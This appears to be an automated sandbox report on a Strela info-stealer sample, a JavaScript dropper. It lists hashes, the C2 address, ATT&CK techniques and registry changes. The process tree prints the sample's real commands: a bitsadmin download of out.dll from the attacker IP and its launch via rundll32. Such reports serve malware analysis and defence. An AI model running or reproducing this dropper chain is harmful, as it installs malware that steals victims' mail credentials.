strela | 1e563b67998108406aa70d7a8df785dd314e8b4cb30ae3679bf7a915aeb9fd68

General

Target

DOC1757424612.js
Size

13KB
MD5

33458c29b7d7a22bbc960f09764c3af6
SHA1

fb04c8b59ab580b33db4237960eba494c764d9a4
SHA256

1e563b67998108406aa70d7a8df785dd314e8b4cb30ae3679bf7a915aeb9fd68
SHA512

c195c21a4c5127546f79ac563f91ce4901c44ea35906e9d8867cabd357a6fd1e99e94ce3841ef40c380dfe36b078aa39257dba136f7f19459537dcc99ed4d1bf
SSDEEP

384:jFs1d3r6ZJNlIbyq2k785UIro8KTMhSeObY0S9W1WU2:jFCd3r6/jIeq2g85UIrofMzOE0L1WT

Score

10^/10

strela stealer

Malware Config

Extracted

Family

strela

C2

91.215.85.209

Signatures

Strela
An info stealer targeting mail credentials first seen in late 2022.
stealer strela

Blocklisted process makes network request 3 IoCs

flow	pid	Process
5	2780	wscript.exe
7	2780	wscript.exe
9	2780	wscript.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Control Panel\International\Geo\Nation	wscript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
3400	bitsadmin.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	wscript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	wscript.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2780 wrote to memory of 3948	2780	wscript.exe	84
PID 2780 wrote to memory of 3948	2780	wscript.exe	84
PID 3948 wrote to memory of 3400	3948	cmd.exe	86
PID 3948 wrote to memory of 3400	3948	cmd.exe	86
PID 3948 wrote to memory of 2692	3948	cmd.exe	98
PID 3948 wrote to memory of 2692	3948	cmd.exe	98

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\DOC1757424612.js
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2780
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\DOC1757424612.js" "C:\Users\Admin\AppData\Local\Temp\eqaaowwelk.bat" && "C:\Users\Admin\AppData\Local\Temp\eqaaowwelk.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3948
- - C:\Windows\system32\bitsadmin.exe
    bitsadmin /transfer mydownloadjob /download /priority normal http://91.215.85.209/out.dll C:\Users\Admin\AppData\Local\Temp/kzorqwihln.dll
    3⤵
    - Download via BitsAdmin
    PID:3400
- - C:\Windows\system32\rundll32.exe
    rundll32 kzorqwihln.dll,h
    3⤵
    PID:2692

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

BITS Jobs

1

T1197

Privilege Escalation

Defense Evasion

BITS Jobs

1

T1197

Install Root Certificate

Modify Registry

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\eqaaowwelk.bat

Filesize
13KB

MD5
33458c29b7d7a22bbc960f09764c3af6

SHA1
fb04c8b59ab580b33db4237960eba494c764d9a4

SHA256
1e563b67998108406aa70d7a8df785dd314e8b4cb30ae3679bf7a915aeb9fd68

SHA512
c195c21a4c5127546f79ac563f91ce4901c44ea35906e9d8867cabd357a6fd1e99e94ce3841ef40c380dfe36b078aa39257dba136f7f19459537dcc99ed4d1bf

Download Submit
memory/2692-190-0x000000006D7C0000-0x000000006D858000-memory.dmp

Filesize
608KB

Download
memory/2692-191-0x000002287C8C0000-0x000002287C8E1000-memory.dmp

Filesize
132KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads